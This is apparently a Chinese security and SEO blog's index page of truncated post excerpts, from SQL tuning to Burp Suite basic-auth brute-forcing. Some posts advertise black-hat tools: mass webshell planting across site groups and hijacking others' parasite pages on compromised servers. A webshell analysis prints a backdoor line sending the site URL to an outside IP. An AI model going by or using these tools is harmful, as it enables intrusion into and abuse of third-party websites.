Mysql SQL语句优化技巧

2018年02月02日  No comment

1、应尽量避免在 where 子句中使用!=或<>操作符,否则将引擎放弃使用索引而进行全表扫描。2、对查询进行优化,应尽量避免全表扫描,首先应考虑在 where 及 order by 涉及的列上建立索引。3、应尽量避免在 where 子句中对字段进行 null 值判断,否则将导致引擎放弃使用索引而进行全表扫描,如:select id from t where num is null可以在num上设置默认值0,确保表中num列没有null值,然后这样查询:select id from
阅读全文 »

简单的PHP域名授权函数

2018年02月01日  No comment

一些主题开发者或者程序开发者经常会用到域名授权这类,博主闲着没事,就在度娘上研究了一下,发现相关资料还是比较少,基本上有些程序都是需要花钱购买的,还有的需要积分下载之类的,但是很多都是破解分享的,无意中发现了这个函数,感觉挺好玩的,就分享下!<?php function allow_doamin(){ $is_allow=false; $url=trim($_SERVER['SERVER_NAME']); $arr_allow_domain=array(&
阅读全文 »

PHP使用命令行传递 GET/POST 参数

2017年12月13日  No comment

话不多说,先贴代码,代码放到需要传入GET或POST参数的最上面!<?php if(isset($argv) && count($argv)>='2'){   $_G=array_search('-G',$argv);   $_P=array_search('-P',$argv);   if(isset($_G) &
阅读全文 »

burpsuite基础认证爆破

2017年11月29日  No comment

很多小伙伴不知道怎么使用burpsuite对基础认证进行报错,这次工作中遇到了,刚好写篇文章记录一下,更是为了分享给不知道的小伙伴。基础认证有的人可能不知道基础认证是啥,但我相信你一定在实战中遇到过,比如tomcat的manager平台的登录验证:基础认证的数据包跟往常的POST和GET的包认证方式不一样,他的请求包是像下面这样的格式:GET /manager/html HTTP/1.1 Host: www.xxx.com Connection: keep


阅读全文 »

网络安全中机器学习大合集

2017年09月22日  No comment

↑ 数据集安全相关数据样本集DARPA 入侵检测数据集Stratosphere IPS 数据集开放数据集NSA 的数据捕获ADFA 入侵检测数据集NSL-KDD 数据集恶意 URL 数据集多源安全事件数据集恶意软件训练集KDD Cup 1999 数据集Web 攻击载荷WAF 恶意请求数据集恶意软件训练数据集Aktaion 数据集DeepEnd 研究中的犯罪数据集公开可用的 PCAP 文件数据集↑ 论文快速、可靠、准确:使用神经网络建模猜测密码封闭世界之外,应用机器学习在网络入
阅读全文 »

脚本自动采集整站文章标题+内容

2017年06月16日  2 Comments

因为做链轮需要大量新鲜的文章内容和标题等。于是写了个PHP的自动采集,可以采集整站的文章内容效果图如下:可以直接采集整站的文章内容到我们本地。速度和效率上很快。报名参加脚本开发特训的学员可以免费拿到项目期开发的所有的程序脚本!一起来做个唯技术的人吧!
阅读全文 »

站群批量挂马脚本

2017年06月15日  No comment

功能:        一:读取站群内所有网站根目录规则。        二:批量在网站根目录写入指定文件和内容。        三:可寄生一句话或者任意内容。效果图如下:报名参加脚本开发特训的学员可以免费拿到项目期开发的所有的程序脚本!一起来做个唯技术的人吧!
阅读全文 »

黑吃黑:PHP全局劫持别人寄生虫!

2017年06月05日  1 Comment

因为平常做寄生虫的时候,经常发现shell已经被同行做了寄生虫,很烦人。于是觉得,既然别人已经做上排名了,也已经用了shell,那么我们为何不写一个黑吃黑,劫持别人的脚本呢?功能:        1.全局劫持掉别人寄生的页面!(别人寄生多少个!我们劫持多少个!)        2.劫持后并锁定文件!系统内核权限!禁止编辑和修改! 
阅读全文 »

镜像程序实现+原理

2017年05月26日  No comment

昨晚朋友发来个地址,打开一看是一个做镜像程序。看了下演示,发现原理其实很简单,或者说就是在线代理的原理。上午抽时间还原了下这个原理,现在代码分享出来,供有需要的朋友获取。 1、地址归一为了获得更好的效果,所以地址我们完全仿照源站地址,这样就需要使用各种技术来接收这个地址,因为我们这里仅讨论原理,所以就使用伪静态吧,以下是apache的伪静态规则<IfModule mod_rewrite.c> RewriteEngine on RewriteCond&
阅读全文 »

黑吃黑:分析一款asp webshell后门箱子

2017年05月21日  No comment

在群内看到有人分享免杀木马。第一眼感觉哪有这种好事,于是下载下来开始分析。用编辑器打开开始读代码。我们可以看到第三行代码如下:代码为:UserPass="admin123"  '密码一般后门分好多种,直接跟随UserPass变量,直接爆菊。代码内容为:j"<script src=""http://121.50.168.146:8080/api.asp?url="&server.URLE
阅读全文 »